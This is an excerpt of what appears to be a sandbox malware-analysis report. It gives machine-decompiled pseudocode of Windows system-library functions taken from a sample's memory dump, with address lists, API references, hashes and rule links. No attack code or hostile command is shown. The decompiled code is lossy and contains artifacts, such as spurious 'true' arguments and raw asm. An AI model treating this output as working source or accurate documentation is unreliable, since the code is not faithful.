				_t233 = _t232 + _t204;
				if(_v52 == 2) {
					_t234 =  *(_t226 + 0x60);
					_t200 =  *(_t226 + 0x64);
					_v63 =  *((intOrPtr*)(_t226 + 0x4c));
					_t153 =  *((intOrPtr*)(_t226 + 0x58));
					_v104 = _t153;
					_v76 = _t153;
					_t154 =  *((intOrPtr*)(_t226 + 0x5c));
					_v100 = _t154;
					_v72 = _t154;
					_t155 = 0;
					L19:
					_v80 = _t200;
					_v84 = _t234;
					L8:
					if( *((intOrPtr*)(_t226 + 0x74)) > 0) {
						_t206 = _t226 + 0x84;
						_v92 = _t206;
						while(1) {
							_t207 =  *_t206;
							if(_t207 >= 0 || _t207 == 0x80000000) {
								break;
							}
							_t155 = _t155 + 1;
							_t206 = _v92 + 0x10;
							_v92 = _t206;
							if(_t155 <  *((intOrPtr*)(_t226 + 0x74))) {
								continue;
							}
							goto L9;
						}
						_v88 = _t155 << 4;
						_t239 = _v88;
						_t209 = _t226 +  *((intOrPtr*)(_t239 + _t226 + 0x78));
						_v44 = _t209;
						asm("adc eax, [esi+edx+0x7c]");
						_v24 = 0;
						_v28 = _t209;
						_v20 =  *((intOrPtr*)(_t239 + _t226 + 0x80));
						_t160 =  *_v92;
						_v36 =  &_v28;
						_t238 = _v32;
						_v16 = _t160;
						if( *(_t226 + 0x4e) >= 0 || _t160 != 0x80000000) {
							goto L9;
						} else {
							 *((intOrPtr*)(_t209 + 8)) = 0;
							 *((intOrPtr*)(_t209 + 0xc)) = 0;
							 *((intOrPtr*)(_t209 + 0x14)) = 0;
							 *((intOrPtr*)(_t209 + 0x10)) = _v20;
							_t214 = 0;
							_t172 = _t238 + 0x66;
							_v92 = 0;
							_v88 = _t172;
							do {
								if( *((char*)(_t172 - 2)) == 0) {
									goto L31;
								}
								_t214 = _v92;
								if(( *_t172 & 0x000000ff) == ( *(_t226 + 0x4e) & 0x7fff)) {
									_t172 = E36B26600(1, _t214 + 0x20, 0);
									_t214 = _v44;
									 *(_t214 + 8) = _t172;
									 *((intOrPtr*)(_t214 + 0xc)) = 0;
									L34:
									if(_v40 == 0) {
										goto L9;
									}
									_t202 = _v40;
									_t236 = _t202 + 0x1c;
									L36AF2330(_t172, _t202 + 0x1c);
									 *((intOrPtr*)(_t202 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									_t176 =  *((intOrPtr*)(_t202 + 0x94));
									if( *((intOrPtr*)(_t202 + 0x94)) != 0) {
										E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t176);
									}
									_t180 = E36AF5D90(_t214,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", _v20 + 0x10);
									 *((intOrPtr*)(_t202 + 0x94)) = _t180;
									if(_t180 != 0) {
										 *((intOrPtr*)(_t180 + 8)) = _v20;
										 *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x94)) + 0xc)) = _v16;
										_t220 =  *((intOrPtr*)(_t202 + 0x94));
										 *_t220 = _t220 + 0x10;
										 *((intOrPtr*)(_t220 + 4)) = 0;
										E36B288C0( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x94)))), _v28, _v20);
										_t247 = _t247 + 0xc;
									}
									 *((intOrPtr*)(_t202 + 0x20)) = 0;
									E36AF24D0(_t236);
									_t210 = _v76;
									_t161 = _v80;
									_t200 = _v84;
									_t234 = _v88;
									L10:
									_t227 =  *((intOrPtr*)(_t238 + 0x1c));
									_v44 = _t227;
									if(_t227 != 0) {
										 *0x36bd91e0(_v48 + 0x38, _v52, _v63, _t161, _t210, _t234, _t200, _v36,  *((intOrPtr*)(_t238 + 0x20)));
										_v44();
									}
									_pop(_t235);
									_pop(_t243);
									_pop(_t201);
									return E36B24B50(0, _t201, _v8 ^ _t247, _t227, _t235, _t243);
								}
								_t172 = _v88;
								L31:
								_t214 = _t214 + 1;
								_t172 = _t172 + 0x18;
								_v92 = _t214;
								_v88 = _t172;
							} while (_t214 < 4);
							goto L34;
						}
					}
					L9:
					_t161 = _v104;
					_t210 = _v100;
					goto L10;
				}
				_t234 = _t233 | 0xffffffff;
				_t200 = _t234;
				_v84 = _t234;
				_v80 = _t200;
				if( *((intOrPtr*)(_t238 + 0x4c)) == _t151) {
					_t222 = _v72;
					_v105 = _v64;
					_t195 = _v76;
				} else {
					_t197 =  *((intOrPtr*)(_t238 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t197) {
						_v63 = _t197;
					}
					_t195 = _v76 |  *(_t238 + 0x40);
					_t222 = _v72 |  *(_t238 + 0x44);
					_t234 =  *(_t238 + 0x38);
					_t200 =  *(_t238 + 0x3c);
					_v76 = _t195;
					_v72 = _t222;
					_v84 = _t234;
					_v80 = _t200;
				}
				_v104 = _t195;
				_v100 = _t222;
				if( *((char*)(_t238 + 0xc4)) != 0) {
					_t226 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t238 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t238 + 0xc5));
						_t226 = _v48;
					}
					_t196 = _t195 |  *(_t238 + 0xb8);
					_t223 = _t222 |  *(_t238 + 0xbc);
					_t234 = _t234 &  *(_t238 + 0xb0);
					_t200 = _t200 &  *(_t238 + 0xb4);
					_v104 = _t196;
					_v76 = _t196;
					_v100 = _t223;
					_v72 = _t223;
					_v84 = _t234;
					_v80 = _t200;
				}
				_t155 = 0;
				if(_v105 == 0) {
					_v52 = 0;
					_t234 = 0;
					_t200 = 0;
					 *((intOrPtr*)(_t226 + 0x74)) = 0;
					goto L19;
				} else {
					_v52 = 1;
					goto L8;
				}
			}

0x36ae1059
0x36ae1063
0x36ae1069
0x36ae106d
0x36ae106f
0x36ae1076
0x36ae107a
0x36ae107e
0x36ae1088
0x36ae1093
0x36ae1097
0x36ae109b
0x36ae109b
0x36ae109b
0x36ae109d
0x36b3f1b9
0x36b3f1bc
0x36b3f1bf
0x36b3f1c3
0x36b3f1c6
0x36b3f1ca
0x36b3f1ce
0x36b3f1d1
0x36b3f1d5
0x36b3f1d9
0x36b3f255
0x36b3f255
0x36b3f259
0x36ae1118
0x36ae111c
0x36b3f262
0x36b3f268
0x36b3f26c
0x36b3f26c
0x36b3f270
0x00000000
0x00000000
0x36b3f27e
0x36b3f27f
0x36b3f282
0x36b3f289
0x00000000
0x00000000
0x00000000
0x36b3f28b
0x36b3f295
0x36b3f29b
0x36b3f29f
0x36b3f2a3
0x36b3f2a7
0x36b3f2ab
0x36b3f2b5
0x36b3f2c0
0x36b3f2c4
0x36b3f2ca
0x36b3f2d4
0x36b3f2d8
0x36b3f2dc
0x00000000
0x36b3f2ed
0x36b3f2ef
0x36b3f2f2
0x36b3f2f5
0x36b3f2fc
0x36b3f301
0x36b3f303
0x36b3f306
0x36b3f30a
0x36b3f30e
0x36b3f312
0x00000000
0x00000000
0x36b3f323
0x36b3f327
0x36b3f348
0x36b3f34d
0x36b3f351
0x36b3f354
0x36b3f357
0x36b3f35c
0x00000000
0x00000000
0x36b3f362
0x36b3f366
0x36b3f36a
0x36b3f378
0x36b3f37b
0x36b3f383
0x36b3f392
0x36b3f392
0x36b3f3aa
0x36b3f3af
0x36b3f3b7
0x36b3f3bd
0x36b3f3ca
0x36b3f3cd
0x36b3f3d6
0x36b3f3da
0x36b3f3ed
0x36b3f3f2
0x36b3f3f2
0x36b3f3f8
0x36b3f3fb
0x36b3f400
0x36b3f404
0x36b3f408
0x36b3f40c
0x36ae112a
0x36ae112a
0x36ae112d
0x36ae1133
0x36ae1153
0x36ae1159
0x36ae1159
0x36ae1163
0x36ae1164
0x36ae1165
0x36ae1170
0x36ae1170
0x36b3f329
0x36b3f32d
0x36b3f32d
0x36b3f32e
0x36b3f331
0x36b3f335
0x36b3f339
0x00000000
0x36b3f33e
0x36b3f2dc
0x36ae1122
0x36ae1122
0x36ae1126
0x00000000
0x36ae1126
0x36ae10a3
0x36ae10a6
0x36ae10a8
0x36ae10ac
0x36ae10b3
0x36b3f1e1
0x36b3f1e5
0x36b3f1e9
0x36ae10b9
0x36ae10b9
0x36ae10bc
0x36ae10c5
0x36ae10c7
0x36ae10c7
0x36ae10d3
0x36ae10d6
0x36ae10d9
0x36ae10dc
0x36ae10df
0x36ae10e3
0x36ae10e7
0x36ae10eb
0x36ae10eb
0x36ae10f6
0x36ae10fa
0x36ae10fe
0x36b3f1fc
0x36b3f200
0x36b3f205
0x36b3f20d
0x36b3f211
0x36b3f211
0x36b3f215
0x36b3f21b
0x36b3f221
0x36b3f227
0x36b3f22d
0x36b3f231
0x36b3f235
0x36b3f239
0x36b3f23d
0x36b3f241
0x36b3f241
0x36ae1104
0x36ae110a
0x36b3f24a
0x36b3f24e
0x36b3f250
0x36b3f252
0x00000000
0x36ae1110
0x36ae1110
0x00000000
0x36ae1110

APIs

RtlDebugPrintTimes.NTDLL ref: 36AE1153

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: c3ce879e3857bfaa9f63f541abfaaea3b6927eb2c1b38dae30c859b75f8f61c9
Instruction ID: 6454717445b11a8d1657d471673f6a54a73494b404c9075011fdc146b85519f7
Opcode Fuzzy Hash: c3ce879e3857bfaa9f63f541abfaaea3b6927eb2c1b38dae30c859b75f8f61c9
Instruction Fuzzy Hash: 37B100B5A093908FD354CF28C980A5AFBF1BB88304F14496EF8999B352D771E845CF92

Uniqueness

Uniqueness Score: -1.00%

Function 36B655E0 Relevance: 1.7, APIs: 1, Instructions: 246
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E36B655E0(void* _a4) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				void _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char _v108;
				void* _t84;
				signed char _t91;
				intOrPtr _t94;
				void* _t103;
				char* _t122;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t128;
				char* _t136;
				intOrPtr _t141;
				intOrPtr _t144;
				signed int _t145;
				signed int _t148;
				intOrPtr _t151;
				void* _t159;
				void* _t160;
				intOrPtr* _t161;

				_t159 = _a4;
				_push("true");
				_push(0x3000);
				_push(_t159);
				_push(0);
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_push( &_v8);
				_push(0xffffffff);
				_t141 = E36B22B10();
				if(_t141 >= 0) {
					_t145 = 0xb;
					memcpy(_v8, _t159, _t145 << 2);
					_push(0);
					_push(0);
					_push(0);
					_push(0x1f0003);
					_push( &_v20);
					_t141 = E36B22E30();
					if(_t141 < 0) {
						goto L27;
					}
					_t160 = _a4;
					_t91 =  *(_t160 + 4);
					_t148 = _t91 & 0x00000002;
					if((_t91 & 0x00000008) != 0) {
						_t148 = _t148 | 0x00000004;
					}
					_t141 = E36B65870(_t148 | 0x00000001, 0, 0, 0,  &_v108);
					if(_t141 != 0) {
						if(_t141 != 0x129) {
							 *((intOrPtr*)(_t160 + 0x1c)) = 0;
							 *((intOrPtr*)(_t160 + 0x20)) = 0;
							 *((intOrPtr*)(_t160 + 0x24)) = 0;
							 *((intOrPtr*)(_t160 + 0x28)) = 0;
							_t94 =  *((intOrPtr*)(_t160 + 0x10));
							if(_t94 != 0) {
								_push(0);
								_push(_t94);
								E36B22A70();
							}
							goto L27;
						}
						_push(0);
						 *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) = 1;
						_push(_v16);
						E36B22A70();
						_push(_v16);
						E36B22A80();
						if(_v12 != 0) {
							_push(0);
							_push(0);
							_push(_v12);
							E36B229D0();
							_push(_v12);
							E36B22A80();
						}
						_t161 =  *((intOrPtr*)(_v8 + 8));
						_t103 = _v8;
						if(_t161 == 0) {
							if(( *(_t103 + 4) & 0x00000004) == 0) {
								_push(0);
								_push(0xfffffffe);
								E36B24570();
							}
						} else {
							 *0x36bd91e0( *((intOrPtr*)(_t103 + 0xc)));
							 *_t161();
						}
						_push(0x8000);
						_v24 =  *_v8;
						_push( &_v24);
						_push( &_v8);
						_push(0xffffffff);
						_t141 = E36B22B90();
						_push(_t141);
						_push(0xffffffff);
						L8:
						E36B22C70();
						goto L27;
					}
					_t151 = _v104;
					_push(2);
					 *((intOrPtr*)(_t160 + 0x20)) = _v100;
					_push(0);
					 *((intOrPtr*)(_t160 + 0x24)) = _v96;
					_push(0x1f0003);
					 *((intOrPtr*)(_t160 + 0x28)) = _v92;
					_push( &_v16);
					_push(_t151);
					_push(_v20);
					 *((intOrPtr*)(_t160 + 0x1c)) = _t151;
					_push(0xffffffff);
					if(E36B22D70() >= 0) {
						_push(0);
						_push("true");
						_t122 =  &_v16;
						_push(_t122);
						_push(_t122);
						_push(_v104);
						_t141 = E36B22D50();
						if(_t141 < 0) {
							goto L7;
						}
						_t124 =  *((intOrPtr*)(_t160 + 0x18));
						if(_t124 == 0) {
							L15:
							_push(_v104);
							E36B24160();
							_push(0);
							_push(0);
							_push(_v20);
							E36B229D0();
							_t127 =  *((intOrPtr*)(_t160 + 0x10));
							_v28 = _t127;
							if(_t127 != 0) {
								_push(0);
								_t144 =  *((intOrPtr*)(_a4 + 0x14));
								_push(_t127);
								_t128 = E36B22A70();
								_push(0);
								_push(0);
								_push(_t144);
								_v32 = _t128;
								E36B229D0();
								_push(_v104);
								E36B22A80();
								_push(_v100);
								E36B22A80();
								_push(_v28);
								E36B22A80();
								_push(_t144);
								E36B22A80();
								_t141 = _v32;
							}
							goto L27;
						}
						_push(2);
						_push(0);
						_push(0x1f0003);
						_push( &_v12);
						_push(_v104);
						_push(_t124);
						_push(0xffffffff);
						_t141 = E36B22D70();
						if(_t141 < 0) {
							goto L7;
						}
						if(( *(_t160 + 4) & 0x00000010) == 0) {
							_push( *((intOrPtr*)(_t160 + 0x18)));
							E36B22A80();
						}
						_push(0);
						_push("true");
						_t136 =  &_v12;
						_push(_t136);
						_push(_t136);
						_push(_v104);
						_t141 = E36B22D50();
						if(_t141 < 0) {
							goto L7;
						} else {
							goto L15;
						}
					}
					L7:
					_push(_t141);
					_push(_v104);
					goto L8;
				} else {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					L27:
					if(_v20 != 0) {
						_push(_v20);
						E36B22A80();
					}
					_t84 = _v8;
					if(_t84 != 0) {
						_v24 =  *_t84;
						_push(0x8000);
						_push( &_v24);
						_push( &_v8);
						_push(0xffffffff);
						E36B22B90();
					}
					return _t141;
				}
			}

0x36b655ea
0x36b655f0
0x36b655f2
0x36b655f7
0x36b655f8
0x36b655f9
0x36b655fc
0x36b655ff
0x36b65602
0x36b65608
0x36b65609
0x36b65610
0x36b65614
0x36b6562a
0x36b6562b
0x36b65633
0x36b65634
0x36b65635
0x36b65636
0x36b6563b
0x36b65641
0x36b65645
0x00000000
0x00000000
0x36b6564b
0x36b6564e
0x36b65653
0x36b65658
0x36b6565a
0x36b6565a
0x36b6566d
0x36b65671
0x36b65783
0x36b65812
0x36b65815
0x36b65818
0x36b6581b
0x36b6581e
0x36b65823
0x36b65825
0x36b65826
0x36b65827
0x36b65827
0x00000000
0x36b65823
0x36b6578f
0x36b65793
0x36b6579a
0x36b6579b
0x36b657a3
0x36b657a4
0x36b657ac
0x36b657ae
0x36b657af
0x36b657b0
0x36b657b3
0x36b657b8
0x36b657bb
0x36b657bb
0x36b657c3
0x36b657c6
0x36b657cb
0x36b657e2
0x36b657e4
0x36b657e5
0x36b657e7
0x36b657e7
0x36b657cd
0x36b657d3
0x36b657d9
0x36b657d9
0x36b657ef
0x36b657f6
0x36b657fc
0x36b65800
0x36b65801
0x36b65808
0x36b6580a
0x36b6580b
0x36b656b0
0x36b656b0
0x00000000
0x36b656b0
0x36b6567a
0x36b6567d
0x36b6567f
0x36b65685
0x36b65686
0x36b6568c
0x36b65691
0x36b65697
0x36b65698
0x36b65699
0x36b6569c
0x36b6569f
0x36b656aa
0x36b656ba
0x36b656bb
0x36b656bd
0x36b656c0
0x36b656c1
0x36b656c2
0x36b656ca
0x36b656ce
0x00000000
0x00000000
0x36b656d0
0x36b656d5
0x36b6571a
0x36b6571a
0x36b6571d
0x36b65722
0x36b65723
0x36b65724
0x36b65727
0x36b6572c
0x36b6572f
0x36b65734
0x36b65743
0x36b65745
0x36b65748
0x36b65749
0x36b6574e
0x36b65750
0x36b65752
0x36b65753
0x36b65756
0x36b6575b
0x36b6575c
0x36b65761
0x36b65762
0x36b65767
0x36b6576a
0x36b6576f
0x36b65770
0x36b65775
0x36b65775
0x00000000
0x36b65734
0x36b656d7
0x36b656d9
0x36b656da
0x36b656e2
0x36b656e3
0x36b656e6
0x36b656e7
0x36b656ee
0x36b656f2
0x00000000
0x00000000
0x36b656f9
0x36b656fe
0x36b656ff
0x36b656ff
0x36b65704
0x36b65705
0x36b65707
0x36b6570a
0x36b6570b
0x36b6570c
0x36b65714
0x36b65718
0x00000000
0x00000000
0x00000000
0x00000000
0x36b65718
0x36b656ac
0x36b656ac
0x36b656ad
0x00000000
0x36b65616
0x36b6561b
0x36b6561c
0x36b6561d
0x36b6561e
0x36b6582c
0x36b65830
0x36b65832
0x36b65835
0x36b65835
0x36b6583a
0x36b6583f
0x36b65843
0x36b65849
0x36b6584e
0x36b65852
0x36b65853
0x36b65855
0x36b65855
0x36b65860
0x36b65860

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b62ffb5a66c94f165f1660715f808480262dd75ebf542a4ba9d46189459bec51
Instruction ID: a9813558be0daa8b289608031e1c8a3d1962c038573cd018be5da9fb03997c9b
Opcode Fuzzy Hash: b62ffb5a66c94f165f1660715f808480262dd75ebf542a4ba9d46189459bec51
Instruction Fuzzy Hash: 54815D71A00319AEDB21DFA6CC81EAFBBF8EF49714F100629E555E7190DA70E900CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 36AE254C Relevance: 1.6, APIs: 1, Instructions: 119
timeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E36AE254C(void* __ebx, intOrPtr __ecx, signed int __edi, void* __esi, void* __eflags) {
				signed int _v4;
				intOrPtr _v16;
				intOrPtr _v128;
				intOrPtr* _v132;
				char _v180;
				intOrPtr _v184;
				signed int _t41;
				void* _t50;
				void* _t61;
				intOrPtr _t66;
				signed int _t67;
				signed int _t68;
				signed int _t69;
				signed int _t75;
				intOrPtr _t76;
				intOrPtr* _t77;
				void* _t78;
				void* _t79;
				signed int _t80;
				signed int _t82;
				signed int _t84;
				intOrPtr* _t85;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t92;
				void* _t108;

				_t61 = __ebx;
				_push("true");
				_push(0x36bbbbe0);
				E36B37C40(__ebx, __edi, __esi);
				_t89 = __ecx;
				_v184 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) != 0) {
					E36B1C819(__ebx, __ecx, _t78, __edi, __ecx, __eflags);
					_t66 =  *((intOrPtr*)(__ecx + 8));
					_t82 = __edi | 0xffffffff;
					__eflags = _t82;
					asm("lock xadd [ecx], eax");
					if(_t82 == 0) {
						E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)),  *0x36bd6644, _t66);
					}
				} else {
					_t82 = __edi | 0xffffffff;
				}
				if( *((intOrPtr*)(_t89 + 0x38)) != _t82) {
					_push( *((intOrPtr*)(_t89 + 0x38)));
					L20();
				}
				_t39 =  *((intOrPtr*)(_t89 + 0x5c));
				if( *((intOrPtr*)(_t89 + 0x5c)) == 0) {
					L36AF2330(_t39, 0x36bd8a30);
					_v4 = 1;
					_t41 = _t89 + 0x60;
					_t79 =  *_t41;
					_t67 =  *(_t41 + 4);
					__eflags =  *(_t79 + 4) - _t41;
					if( *(_t79 + 4) != _t41) {
						goto L19;
					} else {
						__eflags =  *_t67 - _t41;
						if( *_t67 != _t41) {
							goto L19;
						} else {
							 *_t67 = _t79;
							 *(_t79 + 4) = _t67;
							 *(_t41 + 4) = _t41;
							 *_t41 = _t41;
							_v4 = 0xfffffffe;
							_t50 = E36B3FC88();
							goto L10;
						}
					}
				} else {
					L36AF2330(_t39 + 0x2c, _t39 + 0x2c);
					_v4 = _v4 & 0x00000000;
					_t41 = _t89 + 0x60;
					_t79 =  *_t41;
					_t75 =  *(_t41 + 4);
					if( *(_t79 + 4) != _t41 ||  *_t75 != _t41) {
						L19:
						_t68 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t61);
						_push(_t89);
						_t90 = _v4;
						_push(_t82);
						__eflags = _t90;
						if(_t90 != 0) {
							_t41 = _t90 - 0x00000001 | 0x00000007;
							__eflags = _t41 - 0xffffffff;
							if(_t41 != 0xffffffff) {
								__eflags =  *_t90;
								if( *_t90 > 0) {
									__eflags =  *_t90 - 0x7fffffff;
									if( *_t90 != 0x7fffffff) {
										while(1) {
											_t80 =  *_t90;
											__eflags = _t80 - 0x7fffffff;
											if(_t80 == 0x7fffffff) {
												break;
											}
											_t84 = _t80 - 1;
											_t41 = _t80;
											_t68 = _t84;
											asm("lock cmpxchg [esi], ecx");
											__eflags = _t41 - _t80;
											if(_t41 != _t80) {
												continue;
											}
											L27:
											__eflags =  *0x36bd6910;
											if( *0x36bd6910 != 0) {
												asm("lock xadd [esi+0xe8], eax");
												_t41 = E36B0C000(_t68, "true", "true", 0xbadc99 + _t90, 0);
											}
											__eflags = _t84;
											if(_t84 == 0) {
												__eflags =  *0x36bd6911;
												_t69 = _t90;
												if(__eflags != 0) {
													_t41 = E36B6DA40(0x7fffffff, _t69, _t84, _t90, __eflags);
												} else {
													_t41 = E36AD92AF(_t69);
												}
											}
											goto L21;
										}
										_t84 = 0x7fffffff;
										goto L27;
									}
								}
							}
						}
						L21:
						return _t41;
					} else {
						 *_t75 = _t79;
						 *(_t79 + 4) = _t75;
						 *(_t41 + 4) = _t41;
						 *_t41 = _t41;
						_v4 = 0xfffffffe;
						_t50 = E36AE2688(_t89);
						_t76 =  *((intOrPtr*)(_t89 + 0x5c));
						_t108 = _t76 -  *0x36bd6890; // 0x68b07c0
						if(_t108 != 0) {
							__eflags = _t76 -  *0x36bd6888; // 0x0
							if(__eflags != 0) {
								asm("lock xadd [ecx], edi");
								_t87 = _t82 - 1;
								__eflags = _t82 - 1;
								if(__eflags == 0) {
									_t50 = E36ADB705(_t61, _t76, _t87, _t89, __eflags);
								}
							} else {
								_t79 = 0x36bd688c;
								_t77 = 0x36bd6888;
								goto L9;
							}
						} else {
							_t79 = 0x36bd6894;
							_t77 = 0x36bd6890;
							L9:
							_t50 = E36AE2712(_t61, _t77, _t79, _t82, _t89, _t108);
						}
						L10:
						_t85 =  *((intOrPtr*)(_t89 + 0x10));
						if(_t85 != 0) {
							E36B28F40( &_v180, 0, "true");
							_v132 = _t85;
							_t92 =  *((intOrPtr*)(_t89 + 0x34));
							_v128 = _t92;
							E36AE6D60( &_v180);
							 *0x36bd91e0( &_v180, _t92);
							 *_t85();
							_t50 = E36AE61C3( &_v180, _t79);
						}
						 *[fs:0x0] = _v16;
						return _t50;
					}
				}
			}

0x36ae254c
0x36ae254c
0x36ae2551
0x36ae2556
0x36ae255b
0x36ae255d
0x36ae2567
0x36ae2645
0x36ae264a
0x36ae264d
0x36ae264d
0x36ae2652
0x36ae2656
0x36b3fc1b
0x36b3fc1b
0x36ae256d
0x36ae256d
0x36ae256d
0x36ae2573
0x36ae2575
0x36ae2578
0x36ae2578
0x36ae257d
0x36ae2582
0x36b3fc42
0x36b3fc47
0x36b3fc4e
0x36b3fc51
0x36b3fc53
0x36b3fc56
0x36b3fc59
0x00000000
0x36b3fc5f
0x36b3fc5f
0x36b3fc61
0x00000000
0x36b3fc67
0x36b3fc67
0x36b3fc69
0x36b3fc6c
0x36b3fc6f
0x36b3fc71
0x36b3fc78
0x00000000
0x36b3fc78
0x36b3fc61
0x36ae2588
0x36ae258c
0x36ae2591
0x36ae2595
0x36ae2598
0x36ae259a
0x36ae25a0
0x36ae2695
0x36ae2697
0x36ae2698
0x36ae269a
0x36ae269b
0x36ae269c
0x36ae269d
0x36ae269e
0x36ae269f
0x36ae26a5
0x36ae26a6
0x36ae26a7
0x36ae26aa
0x36ae26ab
0x36ae26ad
0x36ae26b9
0x36ae26bc
0x36ae26bf
0x36ae26c1
0x36ae26c4
0x36ae26cb
0x36ae26cd
0x36ae26cf
0x36ae26cf
0x36ae26d1
0x36ae26d3
0x00000000
0x00000000
0x36ae26d5
0x36ae26d8
0x36ae26da
0x36ae26dc
0x36ae26e0
0x36ae26e2
0x00000000
0x00000000
0x36ae26e4
0x36ae26e4
0x36ae26eb
0x36b3fc96
0x36b3fcb3
0x36b3fcb3
0x36ae26f1
0x36ae26f3
0x36ae26f5
0x36ae26fc
0x36ae26fe
0x36ae270b
0x36ae2700
0x36ae2700
0x36ae2700
0x36ae26fe
0x00000000
0x36ae26f3
0x36ae2707
0x00000000
0x36ae2707
0x36ae26cd
0x36ae26c4
0x36ae26bf
0x36ae26af
0x36ae26b3
0x36ae25ae
0x36ae25ae
0x36ae25b0
0x36ae25b3
0x36ae25b6
0x36ae25b8
0x36ae25bf
0x36ae25c4
0x36ae25c7
0x36ae25cd
0x36ae2661
0x36ae2667
0x36ae2678
0x36ae267c
0x36ae267c
0x36ae267d
0x36b3fc33
0x36b3fc33
0x36ae2669
0x36ae2669
0x36ae266e
0x00000000
0x36ae266e
0x36ae25d3
0x36ae25d3
0x36ae25d8
0x36ae25dd
0x36ae25dd
0x36ae25dd
0x36ae25e2
0x36ae25e2
0x36ae25e7
0x36ae2607
0x36ae260f
0x36ae2615
0x36ae2618
0x36ae2621
0x36ae2630
0x36ae2636
0x36ae263e
0x36ae263e
0x36ae25ec
0x36ae25f8
0x36ae25f8
0x36ae25a0

APIs

RtlDebugPrintTimes.NTDLL ref: 36AE2630

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: cfa5f66501a7d1dd5adb4c11cf9cebc12c331baf3d94c5f4934eea186c4076dd
Instruction ID: bb367496009ff8db9d40568cb07ffbbf94bd168408e5f55795d60456e77c8a04
Opcode Fuzzy Hash: cfa5f66501a7d1dd5adb4c11cf9cebc12c331baf3d94c5f4934eea186c4076dd
Instruction Fuzzy Hash: A841EDB4911704CFE724DF24CE50A49B7F2FF45358F2186AAC9069F2A0EB38A941CF56

Uniqueness

Uniqueness Score: -1.00%

Function 36B60443 Relevance: 1.6, APIs: 1, Instructions: 114
timeCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E36B60443(signed int __ecx, char _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v16;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				void* _v48;
				void* _v52;
				intOrPtr _v116;
				signed int _v120;
				char _v124;
				intOrPtr _v128;
				char _v132;
				signed int _v136;
				intOrPtr _v144;
				unsigned short _v152;
				void* _v156;
				void* _v160;
				void* _v172;
				void* _v176;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t46;
				intOrPtr _t68;
				void* _t69;
				void* _t71;
				signed int _t74;
				char _t76;
				void* _t77;
				signed int _t79;
				signed int _t80;
				void* _t81;
				signed int _t83;
				signed int _t85;

				_t70 = __ecx;
				_t85 = (_t83 & 0xfffffff8) - 0x94;
				_v8 =  *0x36bdb370 ^ _t85;
				_t74 =  *0x36bd65fc; // 0x638cdfb3
				_t68 = _a8;
				_v128 = _t68;
				_t79 =  *0x36bd5d38; // 0x6d662cd
				_t76 = _a4;
				_v132 = _t76;
				if(_t74 == 0) {
					_push(_t74);
					_push("true");
					_push( &_v136);
					_push("true");
					_push(0xffffffff);
					if(E36B22B20() < 0) {
						L2:
						E36B38AA0(_t70, _t74, _t54);
					}
					_t74 = _v136;
					 *0x36bd65fc = _t74;
				}
				_push("true");
				_pop(_t71);
				_t70 = _t71 - (_t74 & 0x0000001f);
				asm("ror esi, cl");
				_t80 = _t79 ^ _t74;
				if(_t80 == 0) {
					_t46 = E36B98890(_t68, _t74, _t76, _t80, __eflags,  &_v132, 0x36ab50b4);
				} else {
					_t70 = _t80;
					 *0x36bd91e0( &_v132);
					_t46 =  *_t80();
				}
				if(_t46 != 0xffffffff) {
					_t79 = 0;
					if(E36ADE0E0(0x36ac1298, 0, 0, _t85 + 0x10) == 0) {
						_push(2);
